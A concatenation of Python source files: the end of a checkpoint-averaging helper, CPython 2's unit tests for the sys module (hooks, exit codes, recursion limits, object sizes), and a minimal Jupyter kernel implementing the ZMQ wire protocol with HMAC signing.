p = p.float()
if i == 0:
state_dict[key] = p.numpy()
else:
state_dict[key] = state_dict[key] + p.numpy()
ckpt_num = len(state_dict_list)
for key in state_dict:
state_dict[key] = state_dict[key] / ckpt_num
state_dict[key] = torch.from_numpy(state_dict[key])
return state_dict
to_device = recursive(_to_device)
|
test_sys.py
|
# -*- coding: iso-8859-1 -*-
import unittest, test.test_support
import sys, os, cStringIO
import struct
import operator
class SysModuleTest(unittest.TestCase):
def tearDown(self):
test.test_support.reap_children()
def test_original_displayhook(self):
import __builtin__
savestdout = sys.stdout
out = cStringIO.StringIO()
sys.stdout = out
dh = sys.__displayhook__
self.assertRaises(TypeError, dh)
if hasattr(__builtin__, "_"):
del __builtin__._
dh(None)
self.assertEqual(out.getvalue(), "")
self.assertTrue(not hasattr(__builtin__, "_"))
dh(42)
self.assertEqual(out.getvalue(), "42\n")
self.assertEqual(__builtin__._, 42)
del sys.stdout
self.assertRaises(RuntimeError, dh, 42)
sys.stdout = savestdout
def test_lost_displayhook(self):
olddisplayhook = sys.displayhook
del sys.displayhook
code = compile("42", "<string>", "single")
self.assertRaises(RuntimeError, eval, code)
sys.displayhook = olddisplayhook
def test_custom_displayhook(self):
olddisplayhook = sys.displayhook
def baddisplayhook(obj):
raise ValueError
sys.displayhook = baddisplayhook
code = compile("42", "<string>", "single")
self.assertRaises(ValueError, eval, code)
sys.displayhook = olddisplayhook
def test_original_excepthook(self):
savestderr = sys.stderr
err = cStringIO.StringIO()
sys.stderr = err
eh = sys.__excepthook__
self.assertRaises(TypeError, eh)
try:
raise ValueError(42)
except ValueError, exc:
eh(*sys.exc_info())
sys.stderr = savestderr
self.assertTrue(err.getvalue().endswith("ValueError: 42\n"))
# FIXME: testing the code for a lost or replaced excepthook in
# Python/pythonrun.c::PyErr_PrintEx() is tricky.
def test_exc_clear(self):
self.assertRaises(TypeError, sys.exc_clear, 42)
# Verify that exc_info is present and matches exc, then clear it, and
# check that it worked.
def clear_check(exc):
typ, value, traceback = sys.exc_info()
self.assertTrue(typ is not None)
self.assertTrue(value is exc)
self.assertTrue(traceback is not None)
with test.test_support.check_py3k_warnings():
sys.exc_clear()
typ, value, traceback = sys.exc_info()
self.assertTrue(typ is None)
self.assertTrue(value is None)
self.assertTrue(traceback is None)
def clear():
try:
raise ValueError, 42
except ValueError, exc:
clear_check(exc)
# Raise an exception and check that it can be cleared
clear()
# Verify that a frame currently handling an exception is
# unaffected by calling exc_clear in a nested frame.
try:
raise ValueError, 13
except ValueError, exc:
typ1, value1, traceback1 = sys.exc_info()
clear()
typ2, value2, traceback2 = sys.exc_info()
self.assertTrue(typ1 is typ2)
self.assertTrue(value1 is exc)
self.assertTrue(value1 is value2)
self.assertTrue(traceback1 is traceback2)
# Check that an exception can be cleared outside of an except block
clear_check(exc)
def test_exit(self):
self.assertRaises(TypeError, sys.exit, 42, 42)
# call without argument
try:
sys.exit(0)
except SystemExit, exc:
self.assertEqual(exc.code, 0)
except:
self.fail("wrong exception")
else:
self.fail("no exception")
# call with tuple argument with one entry
# entry will be unpacked
try:
sys.exit(42)
except SystemExit, exc:
self.assertEqual(exc.code, 42)
except:
self.fail("wrong exception")
else:
self.fail("no exception")
# call with integer argument
try:
sys.exit((42,))
except SystemExit, exc:
self.assertEqual(exc.code, 42)
except:
self.fail("wrong exception")
else:
self.fail("no exception")
# call with string argument
try:
sys.exit("exit")
except SystemExit, exc:
self.assertEqual(exc.code, "exit")
except:
self.fail("wrong exception")
else:
self.fail("no exception")
# call with tuple argument with two entries
try:
sys.exit((17, 23))
except SystemExit, exc:
self.assertEqual(exc.code, (17, 23))
except:
self.fail("wrong exception")
else:
self.fail("no exception")
# test that the exit machinery handles SystemExits properly
import subprocess
# both unnormalized...
rc = subprocess.call([sys.executable, "-c",
"raise SystemExit, 46"])
self.assertEqual(rc, 46)
# ... and normalized
rc = subprocess.call([sys.executable, "-c",
"raise SystemExit(47)"])
self.assertEqual(rc, 47)
def check_exit_message(code, expected, env=None):
process = subprocess.Popen([sys.executable, "-c", code],
stderr=subprocess.PIPE, env=env)
stdout, stderr = process.communicate()
self.assertEqual(process.returncode, 1)
self.assertTrue(stderr.startswith(expected),
"%s doesn't start with %s" % (repr(stderr), repr(expected)))
# test that stderr buffer if flushed before the exit message is written
# into stderr
check_exit_message(
r'import sys; sys.stderr.write("unflushed,"); sys.exit("message")',
b"unflushed,message")
# test that the unicode message is encoded to the stderr encoding
env = os.environ.copy()
env['PYTHONIOENCODING'] = 'latin-1'
check_exit_message(
r'import sys; sys.exit(u"h\xe9")',
b"h\xe9", env=env)
def test_getdefaultencoding(self):
if test.test_support.have_unicode:
self.assertRaises(TypeError, sys.getdefaultencoding, 42)
# can't check more than the type, as the user might have changed it
self.assertIsInstance(sys.getdefaultencoding(), str)
# testing sys.settrace() is done in test_sys_settrace.py
# testing sys.setprofile() is done in test_sys_setprofile.py
def test_setcheckinterval(self):
self.assertRaises(TypeError, sys.setcheckinterval)
orig = sys.getcheckinterval()
for n in 0, 100, 120, orig: # orig last to restore starting state
sys.setcheckinterval(n)
self.assertEqual(sys.getcheckinterval(), n)
def test_recursionlimit(self):
self.assertRaises(TypeError, sys.getrecursionlimit, 42)
oldlimit = sys.getrecursionlimit()
self.assertRaises(TypeError, sys.setrecursionlimit)
self.assertRaises(ValueError, sys.setrecursionlimit, -42)
sys.setrecursionlimit(10000)
self.assertEqual(sys.getrecursionlimit(), 10000)
sys.setrecursionlimit(oldlimit)
def test_getwindowsversion(self):
# Raise SkipTest if sys doesn't have getwindowsversion attribute
test.test_support.get_attribute(sys, "getwindowsversion")
v = sys.getwindowsversion()
self.assertEqual(len(v), 5)
self.assertIsInstance(v[0], int)
self.assertIsInstance(v[1], int)
self.assertIsInstance(v[2], int)
self.assertIsInstance(v[3], int)
self.assertIsInstance(v[4], str)
self.assertRaises(IndexError, operator.getitem, v, 5)
self.assertIsInstance(v.major, int)
self.assertIsInstance(v.minor, int)
self.assertIsInstance(v.build, int)
self.assertIsInstance(v.platform, int)
self.assertIsInstance(v.service_pack, str)
self.assertIsInstance(v.service_pack_minor, int)
self.assertIsInstance(v.service_pack_major, int)
self.assertIsInstance(v.suite_mask, int)
self.assertIsInstance(v.product_type, int)
self.assertEqual(v[0], v.major)
self.assertEqual(v[1], v.minor)
self.assertEqual(v[2], v.build)
self.assertEqual(v[3], v.platform)
self.assertEqual(v[4], v.service_pack)
# This is how platform.py calls it. Make sure tuple
# still has 5 elements
maj, min, buildno, plat, csd = sys.getwindowsversion()
def test_dlopenflags(self):
if hasattr(sys, "setdlopenflags"):
self.assertTrue(hasattr(sys, "getdlopenflags"))
self.assertRaises(TypeError, sys.getdlopenflags, 42)
oldflags = sys.getdlopenflags()
self.assertRaises(TypeError, sys.setdlopenflags)
sys.setdlopenflags(oldflags+1)
self.assertEqual(sys.getdlopenflags(), oldflags+1)
sys.setdlopenflags(oldflags)
def test_refcount(self):
# n here must be a global in order for this test to pass while
# tracing with a python function. Tracing calls PyFrame_FastToLocals
# which will add a copy of any locals to the frame object, causing
# the reference count to increase by 2 instead of 1.
global n
self.assertRaises(TypeError, sys.getrefcount)
c = sys.getrefcount(None)
n = None
self.assertEqual(sys.getrefcount(None), c+1)
del n
self.assertEqual(sys.getrefcount(None), c)
if hasattr(sys, "gettotalrefcount"):
self.assertIsInstance(sys.gettotalrefcount(), int)
def test_getframe(self):
self.assertRaises(TypeError, sys._getframe, 42, 42)
self.assertRaises(ValueError, sys._getframe, 2000000000)
self.assertTrue(
SysModuleTest.test_getframe.im_func.func_code \
is sys._getframe().f_code
)
# sys._current_frames() is a CPython-only gimmick.
def test_current_frames(self):
have_threads = True
try:
import thread
except ImportError:
have_threads = False
if have_threads:
self.current_frames_with_threads()
else:
self.current_frames_without_threads()
# Test sys._current_frames() in a WITH_THREADS build.
@test.test_support.reap_threads
def current_frames_with_threads(self):
import threading, thread
import traceback
# Spawn a thread that blocks at a known place. Then the main
# thread does sys._current_frames(), and verifies that the frames
# returned make sense.
entered_g = threading.Event()
leave_g = threading.Event()
thread_info = [] # the thread's id
def f123():
g456()
def g456():
thread_info.append(thread.get_ident())
entered_g.set()
leave_g.wait()
t = threading.Thread(target=f123)
t.start()
entered_g.wait()
# At this point, t has finished its entered_g.set(), although it's
# impossible to guess whether it's still on that line or has moved on
# to its leave_g.wait().
self.assertEqual(len(thread_info), 1)
thread_id = thread_info[0]
d = sys._current_frames()
main_id = thread.get_ident()
self.assertIn(main_id, d)
self.assertIn(thread_id, d)
# Verify that the captured main-thread frame is _this_ frame.
frame = d.pop(main_id)
self.assertTrue(frame is sys._getframe())
# Verify that the captured thread frame is blocked in g456, called
# from f123. This is a litte tricky, since various bits of
# threading.py are also in the thread's call stack.
frame = d.pop(thread_id)
stack = traceback.extract_stack(frame)
for i, (filename, lineno, funcname, sourceline) in enumerate(stack):
if funcname == "f123":
break
else:
self.fail("didn't find f123() on thread's call stack")
self.assertEqual(sourceline, "g456()")
# And the next record must be for g456().
filename, lineno, funcname, sourceline = stack[i+1]
self.assertEqual(funcname, "g456")
self.assertIn(sourceline, ["leave_g.wait()", "entered_g.set()"])
# Reap the spawned thread.
leave_g.set()
t.join()
# Test sys._current_frames() when thread support doesn't exist.
def current_frames_without_threads(self):
# Not much happens here: there is only one thread, with artificial
# "thread id" 0.
d = sys._current_frames()
self.assertEqual(len(d), 1)
self.assertIn(0, d)
self.assertTrue(d[0] is sys._getframe())
def test_attributes(self):
self.assertIsInstance(sys.api_version, int)
self.assertIsInstance(sys.argv, list)
self.assertIn(sys.byteorder, ("little", "big"))
self.assertIsInstance(sys.builtin_module_names, tuple)
self.assertIsInstance(sys.copyright, basestring)
self.assertIsInstance(sys.exec_prefix, basestring)
self.assertIsInstance(sys.executable, basestring)
self.assertEqual(len(sys.float_info), 11)
self.assertEqual(sys.float_info.radix, 2)
self.assertEqual(len(sys.long_info), 2)
self.assertTrue(sys.long_info.bits_per_digit % 5 == 0)
self.assertTrue(sys.long_info.sizeof_digit >= 1)
self.assertEqual(type(sys.long_info.bits_per_digit), int)
self.assertEqual(type(sys.long_info.sizeof_digit), int)
self.assertIsInstance(sys.hexversion, int)
self.assertIsInstance(sys.maxint, int)
if test.test_support.have_unicode:
self.assertIsInstance(sys.maxunicode, int)
self.assertIsInstance(sys.platform, basestring)
self.assertIsInstance(sys.prefix, basestring)
self.assertIsInstance(sys.version, basestring)
vi = sys.version_info
self.assertIsInstance(vi[:], tuple)
self.assertEqual(len(vi), 5)
self.assertIsInstance(vi[0], int)
self.assertIsInstance(vi[1], int)
self.assertIsInstance(vi[2], int)
self.assertIn(vi[3], ("alpha", "beta", "candidate", "final"))
self.assertIsInstance(vi[4], int)
self.assertIsInstance(vi.major, int)
self.assertIsInstance(vi.minor, int)
self.assertIsInstance(vi.micro, int)
self.assertIn(vi.releaselevel, ("alpha", "beta", "candidate", "final"))
self.assertIsInstance(vi.serial, int)
self.assertEqual(vi[0], vi.major)
self.assertEqual(vi[1], vi.minor)
self.assertEqual(vi[2], vi.micro)
self.assertEqual(vi[3], vi.releaselevel)
self.assertEqual(vi[4], vi.serial)
self.assertTrue(vi > (1,0,0))
self.assertIsInstance(sys.float_repr_style, str)
self.assertIn(sys.float_repr_style, ('short', 'legacy'))
def test_43581(self):
# Can't use sys.stdout, as this is a cStringIO object when
# the test runs under regrtest.
self.assertTrue(sys.__stdout__.encoding == sys.__stderr__.encoding)
def test_sys_flags(self):
self.assertTrue(sys.flags)
attrs = ("debug", "py3k_warning", "division_warning", "division_new",
"inspect", "interactive", "optimize", "dont_write_bytecode",
"no_site", "ignore_environment", "tabcheck", "verbose",
"unicode", "bytes_warning")
for attr in attrs:
self.assertTrue(hasattr(sys.flags, attr), attr)
self.assertEqual(type(getattr(sys.flags, attr)), int, attr)
self.assertTrue(repr(sys.flags))
def test_clear_type_cache(self):
sys._clear_type_cache()
def test_ioencoding(self):
import subprocess
env = dict(os.environ)
# Test character: cent sign, encoded as 0x4A (ASCII J) in CP424,
# not representable in ASCII.
env["PYTHONIOENCODING"] = "cp424"
p = subprocess.Popen([sys.executable, "-c", 'print unichr(0xa2)'],
stdout = subprocess.PIPE, env=env)
out = p.communicate()[0].strip()
self.assertEqual(out, unichr(0xa2).encode("cp424"))
env["PYTHONIOENCODING"] = "ascii:replace"
p = subprocess.Popen([sys.executable, "-c", 'print unichr(0xa2)'],
stdout = subprocess.PIPE, env=env)
out = p.communicate()[0].strip()
self.assertEqual(out, '?')
def test_call_tracing(self):
self.assertEqual(sys.call_tracing(str, (2,)), "2")
self.assertRaises(TypeError, sys.call_tracing, str, 2)
def test_executable(self):
# Issue #7774: Ensure that sys.executable is an empty string if argv[0]
# has been set to an non existent program name and Python is unable to
# retrieve the real program name
import subprocess
# For a normal installation, it should work without 'cwd'
# argument. For test runs in the build directory, see #7774.
python_dir = os.path.dirname(os.path.realpath(sys.executable))
p = subprocess.Popen(
["nonexistent", "-c", 'import sys; print repr(sys.executable)'],
executable=sys.executable, stdout=subprocess.PIPE, cwd=python_dir)
executable = p.communicate()[0].strip()
p.wait()
self.assertIn(executable, ["''", repr(sys.executable)])
class SizeofTest(unittest.TestCase):
TPFLAGS_HAVE_GC = 1<<14
TPFLAGS_HEAPTYPE = 1L<<9
def setUp(self):
self.c = len(struct.pack('c', ' '))
self.H = len(struct.pack('H', 0))
self.i = len(struct.pack('i', 0))
self.l = len(struct.pack('l', 0))
self.P = len(struct.pack('P', 0))
# due to missing size_t information from struct, it is assumed that
# sizeof(Py_ssize_t) = sizeof(void*)
self.header = 'PP'
self.vheader = self.header + 'P'
if hasattr(sys, "gettotalrefcount"):
self.header += '2P'
self.vheader += '2P'
self.longdigit = sys.long_info.sizeof_digit
import _testcapi
self.gc_headsize = _testcapi.SIZEOF_PYGC_HEAD
self.file = open(test.test_support.TESTFN, 'wb')
def tearDown(self):
self.file.close()
test.test_support.unlink(test.test_support.TESTFN)
def check_sizeof(self, o, size):
result = sys.getsizeof(o)
if ((type(o) == type) and (o.__flags__ & self.TPFLAGS_HEAPTYPE) or\
((type(o) != type) and (type(o).__flags__ & self.TPFLAGS_HAVE_GC))):
size += self.gc_headsize
msg = 'wrong size for %s: got %d, expected %d' \
% (type(o), result, size)
self.assertEqual(result, size, msg)
def calcsize(self, fmt):
"""Wrapper around struct.calcsize which enforces the alignment of the
end of a structure to the alignment requirement of pointer.
Note: This wrapper should only be used if a pointer member is included
and no member with a size larger than a pointer exists.
"""
return struct.calcsize(fmt + '0P')
def test_gc_head_size(self):
# Check that the gc header size is added to objects tracked by the gc.
h = self.header
size = self.calcsize
gc_header_size = self.gc_headsize
# bool objects are not gc tracked
self.assertEqual(sys.getsizeof(True), size(h + 'l'))
# but lists are
self.assertEqual(sys.getsizeof([]), size(h + 'P PP') + gc_header_size)
def test_default(self):
h = self.header
size = self.calcsize
self.assertEqual(sys.getsizeof(True, -1), size(h + 'l'))
def test_objecttypes(self):
# check all types defined in Objects/
h = self.header
vh = self.vheader
size = self.calcsize
check = self.check_sizeof
# bool
check(True, size(h + 'l'))
# buffer
with test.test_support.check_py3k_warnings():
check(buffer(''), size(h + '2P2Pil'))
# builtin_function_or_method
check(len, size(h + '3P'))
# bytearray
samples = ['', 'u'*100000]
for sample in samples:
x = bytearray(sample)
check(x, size(vh + 'iPP') + x.__alloc__() * self.c)
# bytearray_iterator
check(iter(bytearray()), size(h + 'PP'))
# cell
def get_cell():
x = 42
def inner():
return x
return inner
check(get_cell().func_closure[0], size(h + 'P'))
# classobj (old-style class)
class class_oldstyle():
def method():
pass
check(class_oldstyle, size(h + '7P'))
# instance (old-style class)
check(class_oldstyle(), size(h + '3P'))
# instancemethod (old-style class)
check(class_oldstyle().method, size(h + '4P'))
# complex
check(complex(0,1), size(h + '2d'))
# code
check(get_cell().func_code, size(h + '4i8Pi3P'))
# BaseException
check(BaseException(), size(h + '3P'))
# UnicodeEncodeError
check(UnicodeEncodeError("", u"", 0, 0, ""), size(h + '5P2PP'))
# UnicodeDecodeError
check(UnicodeDecodeError("", "", 0, 0, ""), size(h + '5P2PP'))
# UnicodeTranslateError
check(UnicodeTranslateError(u"", 0, 1, ""), size(h + '5P2PP'))
# method_descriptor (descriptor object)
check(str.lower, size(h + '2PP'))
# classmethod_descriptor (descriptor object)
# XXX
# member_descriptor (descriptor object)
import datetime
check(datetime.timedelta.days, size(h + '2PP'))
# getset_descriptor (descriptor object)
import __builtin__
check(__builtin__.file.closed, size(h + '2PP'))
# wrapper_descriptor (descriptor object)
check(int.__add__, size(h + '2P2P'))
# dictproxy
class C(object): pass
check(C.__dict__, size(h + 'P'))
# method-wrapper (descriptor object)
check({}.__iter__, size(h + '2P'))
# dict
check({}, size(h + '3P2P' + 8*'P2P'))
x = {1:1, 2:2, 3:3, 4:4, 5:5, 6:6, 7:7, 8:8}
check(x, size(h + '3P2P' + 8*'P2P') + 16*size('P2P'))
# dictionary-keyiterator
check({}.iterkeys(), size(h + 'P2PPP'))
# dictionary-valueiterator
check({}.itervalues(), size(h + 'P2PPP'))
# dictionary-itemiterator
check({}.iteritems(), size(h + 'P2PPP'))
# ellipses
check(Ellipsis, size(h + ''))
# EncodingMap
import codecs, encodings.iso8859_3
x = codecs.charmap_build(encodings.iso8859_3.decoding_table)
check(x, size(h + '32B2iB'))
# enumerate
check(enumerate([]), size(h + 'l3P'))
# file
check(self.file, size(h + '4P2i4P3i3P3i'))
# float
check(float(0), size(h + 'd'))
# sys.floatinfo
check(sys.float_info, size(vh) + self.P * len(sys.float_info))
# frame
import inspect
CO_MAXBLOCKS = 20
x = inspect.currentframe()
ncells = len(x.f_code.co_cellvars)
nfrees = len(x.f_code.co_freevars)
extras = x.f_code.co_stacksize + x.f_code.co_nlocals +\
ncells + nfrees - 1
check(x, size(vh + '12P3i' + CO_MAXBLOCKS*'3i' + 'P' + extras*'P'))
# function
def func(): pass
check(func, size(h + '9P'))
class c():
@staticmethod
def foo():
pass
@classmethod
def bar(cls):
pass
# staticmethod
check(foo, size(h + 'P'))
# classmethod
check(bar, size(h + 'P'))
# generator
def get_gen(): yield 1
check(get_gen(), size(h + 'Pi2P'))
# integer
check(1, size(h + 'l'))
check(100, size(h + 'l'))
# iterator
check(iter('abc'), size(h + 'lP'))
# callable-iterator
import re
check(re.finditer('',''), size(h + '2P'))
# list
samples = [[], [1,2,3], ['1', '2', '3']]
for sample in samples:
check(sample, size(vh + 'PP') + len(sample)*self.P)
# sortwrapper (list)
# XXX
# cmpwrapper (list)
# XXX
# listiterator (list)
check(iter([]), size(h + 'lP'))
# listreverseiterator (list)
check(reversed([]), size(h + 'lP'))
# long
check(0L, size(vh))
check(1L, size(vh) + self.longdigit)
check(-1L, size(vh) + self.longdigit)
PyLong_BASE = 2**sys.long_info.bits_per_digit
check(long(PyLong_BASE), size(vh) + 2*self.longdigit)
check(long(PyLong_BASE**2-1), size(vh) + 2*self.longdigit)
check(long(PyLong_BASE**2), size(vh) + 3*self.longdigit)
# module
check(unittest, size(h + 'P'))
# None
check(None, size(h + ''))
# object
check(object(), size(h + ''))
# property (descriptor object)
class C(object):
def getx(self): return self.__x
def setx(self, value): self.__x = value
def delx(self): del self.__x
x = property(getx, setx, delx, "")
check(x, size(h + '4Pi'))
# PyCObject
# PyCapsule
# XXX
# rangeiterator
check(iter(xrange(1)), size(h + '4l'))
# reverse
check(reversed(''), size(h + 'PP'))
# set
# frozenset
PySet_MINSIZE = 8
samples = [[], range(10), range(50)]
s = size(h + '3P2P' + PySet_MINSIZE*'lP' + 'lP')
for sample in samples:
minused = len(sample)
if minused == 0: tmp = 1
# the computation of minused is actually a bit more complicated
# but this suffices for the sizeof test
minused = minused*2
newsize = PySet_MINSIZE
while newsize <= minused:
newsize = newsize << 1
if newsize <= 8:
check(set(sample), s)
check(frozenset(sample), s)
else:
check(set(sample), s + newsize*struct.calcsize('lP'))
check(frozenset(sample), s + newsize*struct.calcsize('lP'))
# setiterator
check(iter(set()), size(h + 'P3P'))
# slice
check(slice(1), size(h + '3P'))
# str
check('', struct.calcsize(vh + 'li') + 1)
check('abc', struct.calcsize(vh + 'li') + 1 + 3*self.c)
# super
check(super(int), size(h + '3P'))
# tuple
check((), size(vh))
check((1,2,3), size(vh) + 3*self.P)
# tupleiterator
check(iter(()), size(h + 'lP'))
# type
# (PyTypeObject + PyNumberMethods + PyMappingMethods +
# PySequenceMethods + PyBufferProcs)
s = size(vh + 'P2P15Pl4PP9PP11PI') + size('41P 10P 3P 6P')
class newstyleclass(object):
pass
check(newstyleclass, s)
# builtin type
check(int, s)
# NotImplementedType
import types
check(types.NotImplementedType, s)
# unicode
usize = len(u'\0'.encode('unicode-internal'))
samples = [u'', u'1'*100]
# we need to test for both sizes, because we don't know if the string
# has been cached
for s in samples:
check(s, size(h + 'PPlP') + usize * (len(s) + 1))
# weakref
import weakref
check(weakref.ref(int), size(h + '2Pl2P'))
# weakproxy
# XXX
# weakcallableproxy
check(weakref.proxy(int), size(h + '2Pl2P'))
# xrange
check(xrange(1), size(h + '3l'))
check(xrange(66000), size(h + '3l'))
def test_pythontypes(self):
# check all types defined in Python/
h = self.header
vh = self.vheader
size = self.calcsize
check = self.check_sizeof
# _ast.AST
import _ast
check(_ast.AST(), size(h + ''))
# imp.NullImporter
import imp
check(imp.NullImporter(self.file.name), size(h + ''))
try:
raise TypeError
except TypeError:
tb = sys.exc_info()[2]
# traceback
if tb != None:
check(tb, size(h + '2P2i'))
# symtable entry
# XXX
# sys.flags
check(sys.flags, size(vh) + self.P * len(sys.flags))
def test_main():
test_classes = (SysModuleTest, SizeofTest)
test.test_support.run_unittest(*test_classes)
if __name__ == "__main__":
test_main()
|
jupyter_kernel.py
|
# Originally based on simple_kernel.py
# by Doug Blank <doug.blank@gmail.com>
#
# To adjust debug output, set debug_level to:
# 0 - show no debugging information
# 1 - shows basic running information
# 2 - also shows loop details
# 3 - also shows message details
#
from __future__ import print_function
## General Python imports:
import sys
import os
import json
import hmac
import uuid
import errno
import hashlib
import datetime
import threading
from pprint import pformat
# zmq specific imports:
import zmq
from zmq.eventloop import ioloop, zmqstream
from zmq.error import ZMQError
PYTHON3 = sys.version_info.major == 3
#Globals:
DELIM = b"<IDS|MSG>"
debug_level = 1 # 0 (none) to 3 (all) for various levels of detail
def dprint(level, *args, **kwargs):
""" Show debug information """
if level <= debug_level:
print("DEBUG:", *args, file=sys.stderr, **kwargs)
sys.stderr.flush()
class WireProtocol:
def __init__(self, engine_id, secure_key, signature_scheme):
self._engine_id = engine_id
signature_schemes = {"hmac-sha256": hashlib.sha256}
self._auth = hmac.HMAC(
self._str_to_bytes(secure_key),
digestmod=signature_schemes[signature_scheme])
def _str_to_bytes(self, s):
return s.encode('ascii') if PYTHON3 else bytes(s)
def _msg_id(self):
""" Return a new uuid for message id """
return str(uuid.uuid4())
def _new_header(self, msg_type):
"""make a new header"""
return {
"date": datetime.datetime.now().isoformat(),
"msg_id": self._msg_id(),
"username": "kernel",
"session": self._engine_id,
"msg_type": msg_type,
"version": "5.0",
}
def sign(self, msg_lst):
"""
Sign a message with a secure signature.
"""
h = self._auth.copy()
for m in msg_lst:
h.update(m)
return self._str_to_bytes(h.hexdigest())
def serialize_wire_msg(self, msg_type, content=None, parent_header=None, metadata=None, identities=None):
header = self._new_header(msg_type)
if content is None:
content = {}
if parent_header is None:
parent_header = {}
if metadata is None:
metadata = {}
def encode(msg):
return self._str_to_bytes(json.dumps(msg))
msg_lst = [
encode(header),
encode(parent_header),
encode(metadata),
encode(content),
]
signature = self.sign(msg_lst)
parts = [DELIM,
signature,
msg_lst[0],
msg_lst[1],
msg_lst[2],
msg_lst[3]]
if identities:
parts = identities + parts
return parts
def deserialize_wire_msg(self, wire_msg):
"""split the routing prefix and message frames from a message on the wire"""
delim_idx = wire_msg.index(DELIM)
identities = wire_msg[:delim_idx]
m_signature = wire_msg[delim_idx + 1]
msg_frames = wire_msg[delim_idx + 2:]
def decode(msg):
dprint(1, "decode", msg)
return json.loads(msg.decode('ascii') if PYTHON3 else msg)
m = {}
m['header'] = decode(msg_frames[0])
m['parent_header'] = decode(msg_frames[1])
m['metadata'] = decode(msg_frames[2])
m['content'] = decode(msg_frames[3])
dprint(1, "will sign", m)
check_sig = self.sign(msg_frames)
if check_sig != m_signature:
dprint(1, check_sig ,"!=", m_signature)
raise ValueError("Signatures do not match")
dprint(1, "m", m)
dprint(1, "identities", identities)
return identities, m
class OutgoingStream:
def __init__(self, wire, stream):
self._wire = wire
self._stream = stream
def send(self, msg_type, content=None, parent_header=None, metadata=None, identities=None):
parts = self._wire.serialize_wire_msg(msg_type, content=content, parent_header=parent_header, metadata=metadata, identities=identities)
dprint(3, "send parts:", parts)
self._stream.send_multipart(parts)
self._stream.flush()
class ShellHandler:
def __init__(self, engine_id, iopub, shell, driver_info, driver):
self._driver_info = driver_info
self._driver = driver
self._engine_id = engine_id
self._iopub = iopub
self._shell = shell
self._execution_count = 1
self._pending_execute_requests = []
self._pending_execute_request = False
def _begin(self, identities, msg, on_done):
execution_count = self._execution_count
started = datetime.datetime.now().isoformat()
parent_header = msg['header']
code = msg['content']["code"]
self._iopub.send('status', {'execution_state': "busy"}, parent_header=parent_header)
self._execution_count += 1
content = {
'execution_count': execution_count,
'code': code,
}
self._iopub.send('execute_input', content, parent_header=parent_header)
def _done(result_data, result_metadata=None):
if result_metadata is None:
result_metadata = {}
self._iopub.send('status', {'execution_state': "idle"}, parent_header=parent_header)
content = {
'execution_count': execution_count,
'data': result_data,
'metadata': result_metadata
}
self._iopub.send('execute_result', content, parent_header=parent_header)
metadata = {
"dependencies_met": True,
"engine": self._engine_id,
"status": "ok",
"started": started,
}
content = {
"status": "ok",
"execution_count": execution_count,
"user_variables": {},
"payload": [],
"user_expressions": {},
}
self._shell.send('execute_reply', content, metadata=metadata,
parent_header=parent_header, identities=identities)
on_done()
return _done
def execute_request(self, identities, msg):
def schedule_next():
print("schedule_next", self._pending_execute_request, self._pending_execute_requests)
if len(self._pending_execute_requests) == 0:
self._pending_execute_request = False
else:
identities2, msg2 = self._pending_execute_requests.pop(0)
self._execute_request(schedule_next, identities2, msg2)
if self._pending_execute_request:
self._pending_execute_requests.append((identities, msg))
else:
self._execute_request(schedule_next, identities, msg)
def _execute_request(self, on_done, identities, msg):
on_result = self._begin(identities, msg, on_done)
code = msg['content']["code"]
has_displayed = set()
def on_display(display_id, data, metadata):
content = {
"data": data,
"metadata": metadata,
"transient": {
"display_id": display_id,
},
}
display_message_type = 'update_display_data'
if display_id not in has_displayed:
display_message_type = 'display_data'
has_displayed.add(display_id)
self._iopub.send(display_message_type, content, parent_header=msg['header'])
def on_stdout(text):
content = {
'name': "stdout",
'text': text,
}
self._iopub.send('stream', content, parent_header=msg['header'])
self._driver(code, on_stdout, on_display, on_result)
def kernel_info_request(self, identities, msg):
content = {}
content.update(self._driver_info)
content.update({
"protocol_version": "5.0",
"ipython_version": [1, 1, 0, ""],
})
self._shell.send('kernel_info_reply', content, parent_header=msg['header'], identities=identities)
def __call__(self, identities, msg):
dprint(1, "shell received:", identities, msg)
# process request:
msg_type = msg['header']["msg_type"]
if msg_type == "execute_request":
self.execute_request(identities, msg)
elif msg_type == "kernel_info_request":
self.kernel_info_request(identities, msg)
elif msg_type == "history_request":
dprint(1, "unhandled history request")
else:
dprint(1, "unknown msg_type:", msg_type)
class Kernel:
def __init__(self, config, driver_info, driver):
# Clone config so we can update it.
config = json.loads(json.dumps(config))
self._config = config
self._exiting = False
self._engine_id = str(uuid.uuid4())
self._wire = WireProtocol(self._engine_id, config["key"], config["signature_scheme"])
connection = config["transport"] + "://" + config["ip"]
def bind(socket, port):
if port <= 0:
return socket.bind_to_random_port(connection)
else:
socket.bind("%s:%s" % (connection, port))
return port
def wrap_with_deserialization(fn):
def accept(wire_msg):
return fn(*self._wire.deserialize_wire_msg(wire_msg))
return accept
## Initialize:
ioloop.install()
ctx = zmq.Context()
self._heartbeat_socket = ctx.socket(zmq.REP)
config["hb_port"] = bind(self._heartbeat_socket, config["hb_port"])
# IOPub/Sub: also called SubSocketChannel in IPython sources
self._iopub_socket = ctx.socket(zmq.PUB)
config["iopub_port"] = bind(self._iopub_socket, config["iopub_port"])
iopub_stream = zmqstream.ZMQStream(self._iopub_socket)
iopub_stream.on_recv(wrap_with_deserialization(self._iopub_handler))
iopub = OutgoingStream(self._wire, iopub_stream)
self._control_socket = ctx.socket(zmq.ROUTER)
config["control_port"] = bind(self._control_socket, config["control_port"])
control_stream = zmqstream.ZMQStream(self._control_socket)
control_stream.on_recv(wrap_with_deserialization(self._control_handler))
self._stdin_socket = ctx.socket(zmq.ROUTER)
config["stdin_port"] = bind(self._stdin_socket, config["stdin_port"])
stdin_stream = zmqstream.ZMQStream(self._stdin_socket)
stdin_stream.on_recv(wrap_with_deserialization(self._stdin_handler))
self._shell_socket = ctx.socket(zmq.ROUTER)
config["shell_port"] = bind(self._shell_socket, config["shell_port"])
shell_stream = zmqstream.ZMQStream(self._shell_socket)
shell = OutgoingStream(self._wire, shell_stream)
shell_stream.on_recv(wrap_with_deserialization(self._shell_handler))
self._shell_handler_impl = ShellHandler(self._engine_id, iopub, shell, driver_info, driver)
def _control_handler(self, identities, msg):
dprint(1, "control received:", identities, msg)
msg_type = msg['header']["msg_type"]
if msg_type == "shutdown_request":
self._shutdown_request(identities, msg)
def _shell_handler(self, identities, msg):
msg_type = msg['header']["msg_type"]
if msg_type == "shutdown_request":
self._shutdown_request(identities, msg)
else:
self._shell_handler_impl(identities, msg)
def _shutdown_request(self, identities, msg):
self.shutdown()
def _iopub_handler(self, identities, msg):
dprint(1, "iopub received:", identities, msg)
def _stdin_handler(self, identities, msg):
dprint(1, "stdin received:", identities, msg)
